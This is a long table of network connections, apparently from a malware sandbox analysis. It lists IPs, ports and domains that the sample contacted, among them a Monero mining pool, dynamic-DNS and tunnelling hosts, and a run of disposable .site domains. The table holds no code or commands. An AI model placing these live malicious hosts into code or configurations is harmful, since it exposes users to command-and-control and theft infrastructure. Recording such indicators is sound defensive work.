| US | 8.8.8.8:53 | 119.99.230.213.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| BG | 195.230.23.72:80 | tcp | |
| MX | 189.167.22.36:40500 | udp | |
| KZ | 178.88.234.149:40500 | tcp | |
| US | 8.8.8.8:53 | 36.22.167.189.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| BG | 195.230.23.72:80 | tcp | |
| IR | 2.181.218.27:40500 | udp | |
| KR | 221.143.49.222:80 | 221.143.49.222 | tcp |
| US | 8.8.8.8:53 | 27.218.181.2.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| US | 8.8.8.8:53 | 222.49.143.221.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| KR | 221.143.49.222:80 | 221.143.49.222 | tcp |
| SY | 178.253.109.195:40500 | udp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | 195.109.253.178.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| UZ | 87.237.236.86:40500 | udp | |
| US | 8.8.8.8:53 | 86.236.237.87.in-addr.arpa | udp |
| KZ | 89.218.238.106:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 106.238.218.89.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| BG | 195.230.23.72:80 | tcp | |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| KG | 212.112.107.11:40500 | udp | |
| US | 8.8.8.8:53 | login-donor.gl.at.ply.gg | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| UA | 93.175.220.40:40500 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| FR | 163.172.171.111:10343 | xmr-eu2.nanopool.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| AO | 102.219.187.80:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 111.171.172.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.187.219.102.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| KZ | 5.76.2.36:40500 | udp | |
| US | 8.8.8.8:53 | 36.2.76.5.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 84.53.244.106:40500 | udp | |
| US | 8.8.8.8:53 | 106.244.53.84.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 78.36.17.105:40500 | udp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | 105.17.36.78.in-addr.arpa | udp |
| TH | 154.197.69.165:443 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| TH | 154.197.69.165:443 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| TH | 154.197.69.165:443 | tcp | |
| KZ | 31.169.15.229:40500 | udp | |
| TH | 154.197.69.165:443 | tcp | |
| US | 8.8.8.8:53 | 229.15.169.31.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| TJ | 185.177.0.227:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 217.30.164.185:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 185.164.30.217.in-addr.arpa | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CN | 101.200.220.118:8090 | tcp | |
| MX | 187.235.150.54:40500 | udp | |
| US | 8.8.8.8:53 | 54.150.235.187.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.162.48:40500 | udp | |
| US | 8.8.8.8:53 | 48.162.156.90.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CN | 101.200.220.118:8090 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| TR | 85.103.235.188:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 188.235.103.85.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| CN | 101.200.220.118:8090 | tcp | |
| IR | 185.123.69.47:40500 | udp | |
| US | 8.8.8.8:53 | 47.69.123.185.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 178.91.91.13:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 176.67.79.229:40500 | udp | |
| US | 8.8.8.8:53 | 229.79.67.176.in-addr.arpa | udp |
| RU | 185.215.113.67:21405 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| YE | 46.35.93.93:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 93.93.35.46.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | educational-reform.gl.at.ply.gg | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| NL | 178.132.2.10:4000 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 46.36.149.47:40500 | udp | |
| US | 8.8.8.8:53 | 47.149.36.46.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 93.118.99.152:40500 | udp | |
| CN | 101.35.228.105:20443 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | 152.99.118.93.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| SY | 95.212.73.0:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 0.73.212.95.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| TJ | 185.177.0.227:40500 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 101.35.228.105:20443 | tcp | |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| RO | 37.120.247.6:40500 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 6.247.120.37.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| RU | 92.124.152.236:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 236.152.124.92.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 92.47.143.122:40500 | udp | |
| US | 8.8.8.8:53 | 122.143.47.92.in-addr.arpa | udp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 178.89.189.131:40500 | udp | |
| US | 8.8.8.8:53 | 131.189.89.178.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| RU | 178.67.165.88:40500 | udp | |
| YE | 46.161.239.195:40500 | tcp | |
| US | 8.8.8.8:53 | 88.165.67.178.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 78.81.147.173:40500 | udp | |
| US | 8.8.8.8:53 | 173.147.81.78.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | reddemon.xyz | udp |
| US | 66.29.153.21:443 | reddemon.xyz | tcp |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 194.93.26.59:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 21.153.29.66.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| MX | 189.133.187.71:40500 | udp | |
| US | 8.8.8.8:53 | 71.187.133.189.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 66.29.153.21:443 | reddemon.xyz | tcp |
| BG | 195.230.23.72:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 91.122.218.118:40500 | udp | |
| US | 8.8.8.8:53 | 118.218.122.91.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| UZ | 89.249.62.87:40500 | udp | |
| US | 8.8.8.8:53 | 87.62.249.89.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CN | 110.40.138.5:4545 | tcp | |
| YE | 178.130.103.42:40500 | udp | |
| US | 8.8.8.8:53 | 42.103.130.178.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| MU | 102.207.195.84:40500 | udp | |
| US | 8.8.8.8:53 | 84.195.207.102.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| MX | 189.173.142.192:40500 | tcp | |
| AO | 154.118.201.198:40500 | udp | |
| CN | 110.40.138.5:4545 | tcp | |
| US | 8.8.8.8:53 | 198.201.118.154.in-addr.arpa | udp |
| NL | 89.110.69.103:80 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 213.230.71.228:40500 | udp | |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | 228.71.230.213.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| YE | 134.35.158.149:40500 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 149.158.35.134.in-addr.arpa | udp |
| UZ | 90.156.194.146:40500 | udp | |
| RU | 185.215.113.67:21405 | tcp | |
| US | 8.8.8.8:53 | 146.194.156.90.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 37.151.27.190:40500 | udp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| KZ | 37.151.202.166:40500 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 190.27.151.37.in-addr.arpa | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| IR | 195.181.23.242:40500 | udp | |
| N/A | 127.0.0.1:9222 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 242.23.181.195.in-addr.arpa | udp |
| IR | 2.187.40.5:40500 | udp | |
| N/A | 127.0.0.1:58963 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| RU | 94.51.68.160:40500 | udp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 160.68.51.94.in-addr.arpa | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| BG | 195.230.23.72:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 217.30.162.161:40500 | udp | |
| US | 8.8.8.8:53 | 161.162.30.217.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| BG | 195.230.23.72:80 | tcp | |
| SG | 216.107.138.162:40500 | udp | |
| US | 8.8.8.8:53 | 162.138.107.216.in-addr.arpa | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 188.215.221.55:40500 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| IR | 2.176.72.136:40500 | udp | |
| US | 8.8.8.8:53 | 136.72.176.2.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| UZ | 62.209.135.143:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| US | 8.8.8.8:53 | 143.135.209.62.in-addr.arpa | udp |
| NL | 178.132.2.10:4000 | tcp | |
| CN | 120.46.212.33:4433 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| VE | 190.202.1.132:40500 | udp | |
| US | 8.8.8.8:53 | 132.1.202.190.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CN | 120.46.212.33:4433 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 2.180.115.76:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 76.115.180.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 26.185.184.104:942 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| MX | 201.108.200.21:40500 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 46.248.34.105:40500 | udp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | 105.34.248.46.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| MX | 201.114.202.249:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 249.202.114.201.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 5.251.95.166:40500 | udp | |
| DE | 193.161.193.99:25170 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | 166.95.251.5.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 2.181.206.190:40500 | udp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 20.83.148.22:80 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 190.206.181.2.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| N/A | 127.0.0.1:58963 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 151.232.164.243:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 243.164.232.151.in-addr.arpa | udp |
| DE | 193.161.193.99:25170 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 37.151.202.166:40500 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.167.42:40500 | udp | |
| HK | 43.155.93.125:80 | 43.155.93.125 | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 42.167.156.90.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 125.93.155.43.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 26.185.184.104:942 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| IR | 2.181.170.246:40500 | udp | |
| US | 8.8.8.8:53 | 246.170.181.2.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| BG | 195.230.23.72:80 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | thighpecr.cyou | udp |
| US | 8.8.8.8:53 | seallysl.site | udp |
| US | 8.8.8.8:53 | opposezmny.site | udp |
| KZ | 37.99.54.230:40500 | tcp | |
| US | 8.8.8.8:53 | goalyfeastz.site | udp |
| KZ | 89.218.186.142:40500 | udp | |
| US | 8.8.8.8:53 | contemteny.site | udp |
| US | 8.8.8.8:53 | dilemmadu.site | udp |
| US | 8.8.8.8:53 | faulteyotk.site | udp |
| US | 8.8.8.8:53 | authorisev.site | udp |
| US | 8.8.8.8:53 | servicedny.site | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 92.122.63.136:443 | steamcommunity.com | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | 142.186.218.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.63.122.92.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 26.185.184.104:942 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 2.189.231.17:40500 | udp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 17.231.189.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.213.58.216.in-addr.arpa | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| SY | 5.134.251.133:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 133.251.134.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| IR | 2.187.89.214:40500 | udp | |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | clients2.google.com | udp |
